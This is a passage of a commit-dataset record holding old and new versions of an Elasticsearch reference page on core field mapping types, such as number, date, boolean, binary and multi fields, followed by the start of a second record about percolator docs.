norms on it. In particular, this is the case for fields that are used solely
for filtering or aggregations.

added[1.2.0]
In case you would like to disable norms after the fact, it is possible to do so
by using the <<indices-put-mapping,PUT mapping API>>. Please note, however, that
norms won't be removed instantly, but only as your index receives new insertions
or updates and segments get merged. Any score computation on a field that has had
norms removed might return inconsistent results, since some documents won't have
norms anymore while other documents might still have norms.
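As a minimal sketch of such an update (assuming the `tweet` type from the
examples above), the body sent to the PUT mapping API would redefine the
field with norms disabled:

[source,js]
--------------------------------------------------
{
    "tweet" : {
        "properties" : {
            "message" : {
                "type" : "string",
                "norms" : {
                    "enabled" : false
                }
            }
        }
    }
}
--------------------------------------------------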
[float]
[[number]]
==== Number

A number-based type supporting `float`, `double`, `byte`, `short`,
`integer`, and `long`. It uses specific constructs within Lucene in
order to support numeric values. The number types have the same ranges
as the corresponding
http://docs.oracle.com/javase/tutorial/java/nutsandbolts/datatypes.html[Java
types]. An example mapping can be:

[source,js]
--------------------------------------------------
{
    "tweet" : {
        "properties" : {
            "rank" : {
                "type" : "float",
                "null_value" : 1.0
            }
        }
    }
}
--------------------------------------------------

The following table lists all the attributes that can be used with a
number type:

[cols="<,<",options="header",]
|=======================================================================
|Attribute |Description
|`type` |The type of the number. Can be `float`, `double`, `integer`,
`long`, `short`, `byte`. Required.

|`index_name` |The name of the field that will be stored in the index.
Defaults to the property/field name.

|`store` |Set to `true` to actually store the field in the index, `false` to not
store it. Defaults to `false` (note, the JSON document itself is stored,
and it can be retrieved from it).

|`index` |Set to `no` if the value should not be indexed. Setting to
`no` disables `include_in_all`. If set to `no`, the field should either be stored
in `_source`, have `include_in_all` enabled, or have `store` set to
`true` for this to be useful.

|`doc_values` |Set to `true` to store field values in a column-stride fashion.
Automatically set to `true` when the fielddata format is `doc_values`.

|`precision_step` |The precision step (influences the number of terms
generated for each number value). Defaults to `16` for `long` and `double`,
`8` for `short`, `integer` and `float`, and `2147483647` for `byte`.

|`boost` |The boost value. Defaults to `1.0`.

|`null_value` |When there is a (JSON) null value for the field, use the
`null_value` as the field value. Defaults to not adding the field at
all.

|`include_in_all` |Should the field be included in the `_all` field (if
enabled). If `index` is set to `no` this defaults to `false`; otherwise,
it defaults to `true` or to the parent `object` type setting.

|`ignore_malformed` |Ignores a malformed number. Defaults to `false`.

|`coerce` |Tries to convert strings to numbers and truncates fractions for
integers. Defaults to `true`.

|=======================================================================

[float]
[[token_count]]
==== Token Count

The `token_count` type maps to the JSON string type, but indexes and stores
the number of tokens in the string rather than the string itself. For
example:

[source,js]
--------------------------------------------------
{
    "tweet" : {
        "properties" : {
            "name" : {
                "type" : "string",
                "fields" : {
                    "word_count": {
                        "type" : "token_count",
                        "store" : "yes",
                        "analyzer" : "standard"
                    }
                }
            }
        }
    }
}
--------------------------------------------------

All the configuration that can be specified for a number can be specified
for a `token_count`. The only extra configuration is the required
`analyzer` field, which specifies which analyzer to use to break the string
into tokens. For best performance, use an analyzer with no token filters.

[NOTE]
===================================================================
Technically the `token_count` type sums position increments rather than
counting tokens. This means that even if the analyzer filters out stop
words they are included in the count.
===================================================================
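Because the token count is indexed as a number, it can be queried like any
other number. As a sketch, assuming the mapping above, a `range` query on
the `name.word_count` path finds tweets whose `name` produced more than
two tokens:

[source,js]
--------------------------------------------------
{
    "query" : {
        "range" : {
            "name.word_count" : {
                "gt" : 2
            }
        }
    }
}
--------------------------------------------------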
[float]
[[date]]
==== Date

The date type is a special type which maps to the JSON string type. It
follows a specific format that can be explicitly set. All dates are
`UTC`. Internally, a date maps to a number type `long`, with the added
parsing stage from string to long and from long to string. An example
mapping:

[source,js]
--------------------------------------------------
{
    "tweet" : {
        "properties" : {
            "postDate" : {
                "type" : "date",
                "format" : "YYYY-MM-dd"
            }
        }
    }
}
--------------------------------------------------

The date type will also accept a long number representing UTC
milliseconds since the epoch, in addition to the string formats it can
handle.
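For example, with the mapping above, the following two hypothetical
documents index the same point in time, since midnight on 2009-11-15 (UTC)
equals `1258243200000` milliseconds since the epoch:

[source,js]
--------------------------------------------------
{ "postDate" : "2009-11-15" }

{ "postDate" : 1258243200000 }
--------------------------------------------------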
The following table lists all the attributes that can be used with a
date type:

[cols="<,<",options="header",]
|=======================================================================
|Attribute |Description
|`index_name` |The name of the field that will be stored in the index.
Defaults to the property/field name.

|`format` |The <<mapping-date-format,date
format>>. Defaults to `dateOptionalTime`.

|`store` |Set to `true` to actually store the field in the index, `false` to not
store it. Defaults to `false` (note, the JSON document itself is stored,
and it can be retrieved from it).

|`index` |Set to `no` if the value should not be indexed. Setting to
`no` disables `include_in_all`. If set to `no`, the field should either be stored
in `_source`, have `include_in_all` enabled, or have `store` set to
`true` for this to be useful.

|`doc_values` |Set to `true` to store field values in a column-stride fashion.
Automatically set to `true` when the fielddata format is `doc_values`.

|`precision_step` |The precision step (influences the number of terms
generated for each number value). Defaults to `16`.

|`boost` |The boost value. Defaults to `1.0`.

|`null_value` |When there is a (JSON) null value for the field, use the
`null_value` as the field value. Defaults to not adding the field at
all.

|`include_in_all` |Should the field be included in the `_all` field (if
enabled). If `index` is set to `no` this defaults to `false`; otherwise,
it defaults to `true` or to the parent `object` type setting.

|`ignore_malformed` |Ignores a malformed date. Defaults to `false`.

|=======================================================================

[float]
[[boolean]]
==== Boolean

The boolean type maps to the JSON boolean type. It ends up storing
within the index either `T` or `F`, with automatic translation to `true`
and `false` respectively.

[source,js]
--------------------------------------------------
{
    "tweet" : {
        "properties" : {
            "hes_my_special_tweet" : {
                "type" : "boolean"
            }
        }
    }
}
--------------------------------------------------

The boolean type also supports passing the value as a number or a string
(in this case `0`, an empty string, `false`, `off` and `no` are
`false`, and all other values are `true`).

The following table lists all the attributes that can be used with the
boolean type:

[cols="<,<",options="header",]
|=======================================================================
|Attribute |Description
|`index_name` |The name of the field that will be stored in the index.
Defaults to the property/field name.

|`store` |Set to `true` to actually store the field in the index, `false` to not
store it. Defaults to `false` (note, the JSON document itself is stored,
and it can be retrieved from it).

|`index` |Set to `no` if the value should not be indexed. Setting to
`no` disables `include_in_all`. If set to `no`, the field should either be stored
in `_source`, have `include_in_all` enabled, or have `store` set to
`true` for this to be useful.

|`boost` |The boost value. Defaults to `1.0`.

|`null_value` |When there is a (JSON) null value for the field, use the
`null_value` as the field value. Defaults to not adding the field at
all.
|=======================================================================

[float]
[[binary]]
==== Binary

The binary type is a base64 representation of binary data that can be
stored in the index. The field is not stored by default and is not
indexed at all.

[source,js]
--------------------------------------------------
{
    "tweet" : {
        "properties" : {
            "image" : {
                "type" : "binary"
            }
        }
    }
}
--------------------------------------------------

The following table lists all the attributes that can be used with the
binary type:

[horizontal]

`index_name`::

    The name of the field that will be stored in the index. Defaults to the
    property/field name.

`store`::

    Set to `true` to actually store the field in the index, `false` to not store it.
    Defaults to `false` (note, the JSON document itself is already stored, so
    the binary field can be retrieved from there).

`doc_values`::

    Set to `true` to store field values in a column-stride fashion.

`compress`::

    Set to `true` to compress the stored binary value.

`compress_threshold`::

    Compression will only be applied to stored binary fields that are greater
    than this size. Defaults to `-1`.

NOTE: Enabling compression on stored binary fields only makes sense on large
and highly-compressible values. Otherwise per-field compression is usually not
worth doing, as the space savings do not compensate for the overhead of the
compression format.
Normally, you should not configure any compression and
just rely on the block compression of stored fields (which is enabled by
default and can't be disabled).

[float]
[[fielddata-filters]]
==== Fielddata filters

It is possible to control which field values are loaded into memory,
which is particularly useful for faceting on string fields, using
fielddata filters, which are explained in detail in the
<<index-modules-fielddata,Fielddata>> section.

Fielddata filters can exclude terms which do not match a regex, or which
don't fall between a `min` and `max` frequency range:

[source,js]
--------------------------------------------------
{
    "tweet": {
        "type": "string",
        "analyzer": "whitespace",
        "fielddata": {
            "filter": {
                "regex": {
                    "pattern": "^#.*"
                },
                "frequency": {
                    "min": 0.001,
                    "max": 0.1,
                    "min_segment_size": 500
                }
            }
        }
    }
}
--------------------------------------------------

These filters can be updated on an existing field mapping and will take
effect the next time the fielddata for a segment is loaded. Use the
<<indices-clearcache,Clear Cache>> API
to reload the fielddata using the new filters.
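As a sketch (the index name `my_index` is made up, and the exact request
parameters are an assumption that may vary by version), clearing just the
fielddata cache so that it is rebuilt with the new filters might look like:

[source,js]
--------------------------------------------------
POST /my_index/_cache/clear?fielddata=true
--------------------------------------------------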
For example a single field is to be used for both\nfree text search and sorting.\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"name\" : {\n \"type\" : \"string\",\n \"index\" : \"analyzed\",\n \"fields\" : {\n \"raw\" : {\"type\" : \"string\", \"index\" : \"not_analyzed\"}\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nIn the above example the field `name` gets processed twice. The first time it gets\nprocessed as an analyzed string and this version is accessible under the field name\n`name`, this is the main field and is in fact just like any other field. The second time\nit gets processed as a not analyzed string and is accessible under the name `name.raw`.\n\n[float]\n==== Include in All\n\nThe `include_in_all` setting is ignored on any field that is defined in\nthe `fields` options. Setting the `include_in_all` only makes sense on\nthe main field, since the raw field value is copied to the `_all` field,\nthe tokens aren't copied.\n\n[float]\n==== Updating a field\n\nIn the essence a field can't be updated. However multi fields can be\nadded to existing fields. This allows for example to have a different\n`index_analyzer` configuration in addition to the already configured\n`index_analyzer` configuration specified in the main and other multi fields.\n\nAlso the new multi field will only be applied on document that have been\nadded after the multi field has been added and in fact the new multi field\ndoesn't exist in existing documents.\n\nAnother important note is that new multi fields will be merged into the\nlist of existing multi fields, so when adding new multi fields for a field\nprevious added multi fields don't need to be specified.\n\n","old_contents":"[[mapping-core-types]]\n=== Core Types\n\nEach JSON field can be mapped to a specific core type. JSON itself\nalready provides us with some typing, with its support for `string`,\n`integer`\/`long`, `float`\/`double`, `boolean`, and `null`.\n\nThe following sample tweet JSON document will be used to explain the\ncore types:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" {\n \"user\" : \"kimchy\"\n \"message\" : \"This is a tweet!\",\n \"postDate\" : \"2009-11-15T14:12:12\",\n \"priority\" : 4,\n \"rank\" : 12.3\n }\n}\n--------------------------------------------------\n\nExplicit mapping for the above JSON tweet can be:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"user\" : {\"type\" : \"string\", \"index\" : \"not_analyzed\"},\n \"message\" : {\"type\" : \"string\", \"null_value\" : \"na\"},\n \"postDate\" : {\"type\" : \"date\"},\n \"priority\" : {\"type\" : \"integer\"},\n \"rank\" : {\"type\" : \"float\"}\n }\n }\n}\n--------------------------------------------------\n\n[float]\n[[string]]\n==== String\n\nThe text based string type is the most basic type, and contains one or\nmore characters. An example mapping can be:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"message\" : {\n \"type\" : \"string\",\n \"store\" : true,\n \"index\" : \"analyzed\",\n \"null_value\" : \"na\"\n },\n \"user\" : {\n \"type\" : \"string\",\n \"index\" : \"not_analyzed\",\n \"norms\" : {\n \"enabled\" : false\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nThe above mapping defines a `string` `message` property\/field within the\n`tweet` type. 
The field is stored in the index (so it can later be\nretrieved using selective loading when searching), and it gets analyzed\n(broken down into searchable terms). If the message has a `null` value,\nthen the value that will be stored is `na`. There is also a `string` `user`\nwhich is indexed as-is (not broken down into tokens) and has norms\ndisabled (so that matching this field is a binary decision, no match is\nbetter than another one).\n\nThe following table lists all the attributes that can be used with the\n`string` type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`store` |Set to `true` to actually store the field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `analyzed` for the field to be indexed and searchable\nafter being broken down into token using an analyzer. `not_analyzed`\nmeans that its still searchable, but does not go through any analysis\nprocess or broken down into tokens. `no` means that it won't be\nsearchable at all (as an individual field; it may still be included in\n`_all`). Setting to `no` disables `include_in_all`. Defaults to\n`analyzed`.\n\n|`doc_values` |Set to `true` to store field values in a column-stride fashion.\nAutomatically set to `true` when the <<fielddata-formats,`fielddata` format>> is `doc_values`.\n\n|`term_vector` |Possible values are `no`, `yes`, `with_offsets`,\n`with_positions`, `with_positions_offsets`. Defaults to `no`.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n\n|`norms: {enabled: <value>}` |Boolean value if norms should be enabled or\nnot. Defaults to `true` for `analyzed` fields, and to `false` for\n`not_analyzed` fields. See the <<norms,section about norms>>.\n\n|`norms: {loading: <value>}` |Describes how norms should be loaded, possible values are\n`eager` and `lazy` (default). It is possible to change the default value to\neager for all fields by configuring the index setting `index.norms.loading`\nto `eager`.\n\n|`index_options` | Allows to set the indexing\noptions, possible values are `docs` (only doc numbers are indexed),\n`freqs` (doc numbers and term frequencies), and `positions` (doc\nnumbers, term frequencies and positions). Defaults to `positions` for\n`analyzed` fields, and to `docs` for `not_analyzed` fields. It\nis also possible to set it to `offsets` (doc numbers, term\nfrequencies, positions and offsets).\n\n|`analyzer` |The analyzer used to analyze the text contents when\n`analyzed` during indexing and when searching using a query string.\nDefaults to the globally configured analyzer.\n\n|`index_analyzer` |The analyzer used to analyze the text contents when\n`analyzed` during indexing.\n\n|`search_analyzer` |The analyzer used to analyze the field when part of\na query string. Can be updated on an existing field.\n\n|`include_in_all` |Should the field be included in the `_all` field (if\nenabled). 
If `index` is set to `no` this defaults to `false`, otherwise,\ndefaults to `true` or to the parent `object` type setting.\n\n|`ignore_above` |The analyzer will ignore strings larger than this size.\nUseful for generic `not_analyzed` fields that should ignore long text.\n\n|`position_offset_gap` |Position increment gap between field instances\nwith the same field name. Defaults to 0.\n|=======================================================================\n\nThe `string` type also support custom indexing parameters associated\nwith the indexed value. For example:\n\n[source,js]\n--------------------------------------------------\n{\n \"message\" : {\n \"_value\": \"boosted value\",\n \"_boost\": 2.0\n }\n}\n--------------------------------------------------\n\nThe mapping is required to disambiguate the meaning of the document.\nOtherwise, the structure would interpret \"message\" as a value of type\n\"object\". The key `_value` (or `value`) in the inner document specifies\nthe real string content that should eventually be indexed. The `_boost`\n(or `boost`) key specifies the per field document boost (here 2.0).\n\n[float]\n[[norms]]\n===== Norms\n\nNorms store various normalization factors that are later used (at query time)\nin order to compute the score of a document relatively to a query.\n\nAlthough useful for scoring, norms also require quite a lot of memory\n(typically in the order of one byte per document per field in your index,\neven for documents that don't have this specific field). As a consequence, if\nyou don't need scoring on a specific field, it is highly recommended to disable\nnorms on it. In particular, this is the case for fields that are used solely\nfor filtering or aggregations.\n\nadded[1.2.0]\nIn case you would like to disable norms after the fact, it is possible to do so\nby using the <<indices-put-mapping,PUT mapping API>>. Please however note that\nnorms won't be removed instantly, but as your index will receive new insertions\nor updates, and segments get merged. Any score computation on a field that got\nnorms removed might return inconsistent results since some documents won't have\nnorms anymore while other documents might still have norms.\n\n[float]\n[[number]]\n==== Number\n\nA number based type supporting `float`, `double`, `byte`, `short`,\n`integer`, and `long`. It uses specific constructs within Lucene in\norder to support numeric values. The number types have the same ranges\nas corresponding\nhttp:\/\/docs.oracle.com\/javase\/tutorial\/java\/nutsandbolts\/datatypes.html[Java\ntypes]. An example mapping can be:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"rank\" : {\n \"type\" : \"float\",\n \"null_value\" : 1.0\n }\n }\n }\n}\n--------------------------------------------------\n\nThe following table lists all the attributes that can be used with a\nnumbered type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`type` |The type of the number. Can be `float`, `double`, `integer`,\n`long`, `short`, `byte`. Required.\n\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`store` |Set to `true` to store actual field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `no` if the value should not be indexed. 
Setting to\n`no` disables `include_in_all`. If set to `no` the field should be either stored\nin `_source`, have `include_in_all` enabled, or `store` be set to\n`true` for this to be useful.\n\n|`doc_values` |Set to `true` to store field values in a column-stride fashion.\nAutomatically set to `true` when the fielddata format is `doc_values`.\n\n|`precision_step` |The precision step (influences the number of terms\ngenerated for each number value). Defaults to `16` for `long`, `double`,\n`8` for `short`, `integer`, `float`, and `2147483647` for `byte`.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n\n|`include_in_all` |Should the field be included in the `_all` field (if\nenabled). If `index` is set to `no` this defaults to `false`, otherwise,\ndefaults to `true` or to the parent `object` type setting.\n\n|`ignore_malformed` |Ignored a malformed number. Defaults to `false`.\n\n|`coerce` |Try convert strings to numbers and truncate fractions for integers. Defaults to `true`.\n\n|=======================================================================\n\n[float]\n[[token_count]]\n==== Token Count\nThe `token_count` type maps to the JSON string type but indexes and stores\nthe number of tokens in the string rather than the string itself. For\nexample:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"name\" : {\n \"type\" : \"string\",\n \"fields\" : {\n \"word_count\": {\n \"type\" : \"token_count\",\n \"store\" : \"yes\",\n \"analyzer\" : \"standard\"\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nAll the configuration that can be specified for a number can be specified\nfor a token_count. The only extra configuration is the required\n`analyzer` field which specifies which analyzer to use to break the string\ninto tokens. For best performance, use an analyzer with no token filters.\n\n[NOTE]\n===================================================================\nTechnically the `token_count` type sums position increments rather than\ncounting tokens. This means that even if the analyzer filters out stop\nwords they are included in the count.\n===================================================================\n\n[float]\n[[date]]\n==== Date\n\nThe date type is a special type which maps to JSON string type. It\nfollows a specific format that can be explicitly set. All dates are\n`UTC`. Internally, a date maps to a number type `long`, with the added\nparsing stage from string to long and from long to string. An example\nmapping:\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"postDate\" : {\n \"type\" : \"date\",\n \"format\" : \"YYYY-MM-dd\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe date type will also accept a long number representing UTC\nmilliseconds since the epoch, regardless of the format it can handle.\n\nThe following table lists all the attributes that can be used with a\ndate type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`format` |The <<mapping-date-format,date\nformat>>. 
Defaults to `dateOptionalTime`.\n\n|`store` |Set to `true` to store actual field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `no` if the value should not be indexed. Setting to\n`no` disables `include_in_all`. If set to `no` the field should be either stored\nin `_source`, have `include_in_all` enabled, or `store` be set to\n`true` for this to be useful.\n\n|`doc_values` |Set to `true` to store field values in a column-stride fashion.\nAutomatically set to `true` when the fielddata format is `doc_values`.\n\n|`precision_step` |The precision step (influences the number of terms\ngenerated for each number value). Defaults to `16`.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n\n|`include_in_all` |Should the field be included in the `_all` field (if\nenabled). If `index` is set to `no` this defaults to `false`, otherwise,\ndefaults to `true` or to the parent `object` type setting.\n\n|`ignore_malformed` |Ignored a malformed number. Defaults to `false`.\n\n|=======================================================================\n\n[float]\n[[boolean]]\n==== Boolean\n\nThe boolean type Maps to the JSON boolean type. It ends up storing\nwithin the index either `T` or `F`, with automatic translation to `true`\nand `false` respectively.\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"hes_my_special_tweet\" : {\n \"type\" : \"boolean\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe boolean type also supports passing the value as a number or a string\n(in this case `0`, an empty string, `false`, `off` and `no` are\n`false`, all other values are `true`).\n\nThe following table lists all the attributes that can be used with the\nboolean type:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Attribute |Description\n|`index_name` |The name of the field that will be stored in the index.\nDefaults to the property\/field name.\n\n|`store` |Set to `true` to store actual field in the index, `false` to not\nstore it. Defaults to `false` (note, the JSON document itself is stored,\nand it can be retrieved from it).\n\n|`index` |Set to `no` if the value should not be indexed. Setting to\n`no` disables `include_in_all`. If set to `no` the field should be either stored\nin `_source`, have `include_in_all` enabled, or `store` be set to\n`true` for this to be useful.\n\n|`boost` |The boost value. Defaults to `1.0`.\n\n|`null_value` |When there is a (JSON) null value for the field, use the\n`null_value` as the field value. Defaults to not adding the field at\nall.\n|=======================================================================\n\n[float]\n[[binary]]\n==== Binary\n\nThe binary type is a base64 representation of binary data that can be\nstored in the index. 
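Values must be supplied as base64-encoded strings, since JSON cannot carry raw bytes. For example, a document using the `image` mapping below might look like this (the value is an illustrative placeholder):\n\n[source,js]\n--------------------------------------------------\n{\n    \"image\" : \"iVBORw0KGgoAAAANSUhEUgAAAAEAAAAB\"\n}\n--------------------------------------------------\n\n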
The field is not stored by default and not indexed at\nall.\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"image\" : {\n \"type\" : \"binary\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe following table lists all the attributes that can be used with the\nbinary type:\n\n[horizontal]\n\n`index_name`::\n\n The name of the field that will be stored in the index. Defaults to the\n property\/field name.\n\n`store`::\n\n Set to `true` to store actual field in the index, `false` to not store it.\n Defaults to `false` (note, the JSON document itself is already stored, so\n the binary field can be retrieved from there).\n\n`doc_values`::\n\n Set to `true` to store field values in a column-stride fashion.\n\n`compress`::\n\n Set to `true` to compress the stored binary value.\n\n`compress_threshold`::\n\n Compression will only be applied to stored binary fields that are greater\n than this size. Defaults to `-1`\n\nNOTE: Enabling compression on stored binary fields only makes sense on large\nand highly-compressible values. Otherwise per-field compression is usually not\nworth doing as the space savings do not compensate for the overhead of the\ncompression format. Normally, you should not configure any compression and\njust rely on the block compression of stored fields (which is enabled by\ndefault and can't be disabled).\n\n[float]\n[[fielddata-filters]]\n==== Fielddata filters\n\nIt is possible to control which field values are loaded into memory,\nwhich is particularly useful for faceting on string fields, using\nfielddata filters, which are explained in detail in the\n<<index-modules-fielddata,Fielddata>> section.\n\nFielddata filters can exclude terms which do not match a regex, or which\ndon't fall between a `min` and `max` frequency range:\n\n[source,js]\n--------------------------------------------------\n{\n tweet: {\n type: \"string\",\n analyzer: \"whitespace\"\n fielddata: {\n filter: {\n regex: {\n \"pattern\": \"^#.*\"\n },\n frequency: {\n min: 0.001,\n max: 0.1,\n min_segment_size: 500\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nThese filters can be updated on an existing field mapping and will take\neffect the next time the fielddata for a segment is loaded. 
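Already-loaded fielddata is not re-filtered in place; evicting it forces a reload under the new filters, for example (a sketch, with an assumed index name):\n\n[source,js]\n--------------------------------------------------\nPOST \/my_index\/_cache\/clear?fielddata=true\n--------------------------------------------------\n\n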
Use the\n<<indices-clearcache,Clear Cache>> API\nto reload the fielddata using the new filters.\n\n[float]\n==== Similarity\n\nElasticsearch allows you to configure a similarity (scoring algorithm) per field.\nThe `similarity` setting provides a simple way of choosing a similarity algorithm\nother than the default TF\/IDF, such as `BM25`.\n\nYou can configure similarities via the\n<<index-modules-similarity,similarity module>>\n\n[float]\n===== Configuring Similarity per Field\n\nDefining the Similarity for a field is done via the `similarity` mapping\nproperty, as this example shows:\n\n[source,js]\n--------------------------------------------------\n{\n \"book\":{\n \"properties\":{\n \"title\":{\n \"type\":\"string\", \"similarity\":\"BM25\"\n }\n }\n }\n}\n--------------------------------------------------\n\nThe following Similarities are configured out-of-box:\n\n`default`::\n The Default TF\/IDF algorithm used by Elasticsearch and\n Lucene in previous versions.\n\n`BM25`::\n The BM25 algorithm.\n http:\/\/en.wikipedia.org\/wiki\/Okapi_BM25[See Okapi_BM25] for more\n details.\n\n\n[[copy-to]]\n[float]\n===== Copy to field\n\nadded[1.0.0.RC2]\n\nAdding `copy_to` parameter to any field mapping will cause all values of this field to be copied to fields specified in\nthe parameter. In the following example all values from fields `title` and `abstract` will be copied to the field\n`meta_data`.\n\n\n[source,js]\n--------------------------------------------------\n{\n \"book\" : {\n \"properties\" : {\n \"title\" : { \"type\" : \"string\", \"copy_to\" : \"meta_data\" },\n \"abstract\" : { \"type\" : \"string\", \"copy_to\" : \"meta_data\" },\n \"meta_data\" : { \"type\" : \"string\" }\n }\n}\n--------------------------------------------------\n\nMultiple fields are also supported:\n\n[source,js]\n--------------------------------------------------\n{\n \"book\" : {\n \"properties\" : {\n \"title\" : { \"type\" : \"string\", \"copy_to\" : [\"meta_data\", \"article_info\"] }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Multi fields\n\nadded[1.0.0.RC1]\n\nThe `fields` options allows to map several core types fields into a single\njson source field. This can be useful if a single field need to be\nused in different ways. For example a single field is to be used for both\nfree text search and sorting.\n\n[source,js]\n--------------------------------------------------\n{\n \"tweet\" : {\n \"properties\" : {\n \"name\" : {\n \"type\" : \"string\",\n \"index\" : \"analyzed\",\n \"fields\" : {\n \"raw\" : {\"type\" : \"string\", \"index\" : \"not_analyzed\"}\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nIn the above example the field `name` gets processed twice. The first time it gets\nprocessed as an analyzed string and this version is accessible under the field name\n`name`, this is the main field and is in fact just like any other field. The second time\nit gets processed as a not analyzed string and is accessible under the name `name.raw`.\n\n[float]\n==== Include in All\n\nThe `include_in_all` setting is ignored on any field that is defined in\nthe `fields` options. Setting the `include_in_all` only makes sense on\nthe main field, since the raw field value is copied to the `_all` field,\nthe tokens aren't copied.\n\n[float]\n==== Updating a field\n\nIn the essence a field can't be updated. However multi fields can be\nadded to existing fields. 
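For example, a sketch of adding a `raw` multi field to an existing `name` field with the put mapping API (`PUT \/my_index\/_mapping\/tweet`; the index and type names are assumed):\n\n[source,js]\n--------------------------------------------------\n{\n    \"tweet\" : {\n        \"properties\" : {\n            \"name\" : {\n                \"type\" : \"string\",\n                \"fields\" : {\n                    \"raw\" : {\"type\" : \"string\", \"index\" : \"not_analyzed\"}\n                }\n            }\n        }\n    }\n}\n--------------------------------------------------\n\n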
This allows for example to have a different\n`index_analyzer` configuration in addition to the already configured\n`index_analyzer` configuration specified in the main and other multi fields.\n\nAlso the new multi field will only be applied on document that have been\nadded after the multi field has been added and in fact the new multi field\ndoesn't exist in existing documents.\n\nAnother important note is that new multi fields will be merged into the\nlist of existing multi fields, so when adding new multi fields for a field\nprevious added multi fields don't need to be specified.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cef7bd2079c15995b73f9e514a66d5d618bcb400","subject":"docs: add best practises for wildcard queries inside percolator queries","message":"docs: add best practises for wildcard queries inside percolator queries\n","repos":"rajanm\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,scottsom\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gfyoung\/elasticsearch,qwerty4030\/elasticsearch,qwerty4030\/elasticsearch,s1monw\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,wangtuo\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,coding0011\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/reference\/mapping\/types\/percolator.asciidoc","new_file":"docs\/reference\/mapping\/types\/percolator.asciidoc","new_contents":"[[percolator]]\n=== Percolator type\n\nThe `percolator` field type parses a json structure into a native query and\nstores that query, so that the <<query-dsl-percolate-query,percolate query>>\ncan use it to match provided documents.\n\nAny field that contains a json object can be 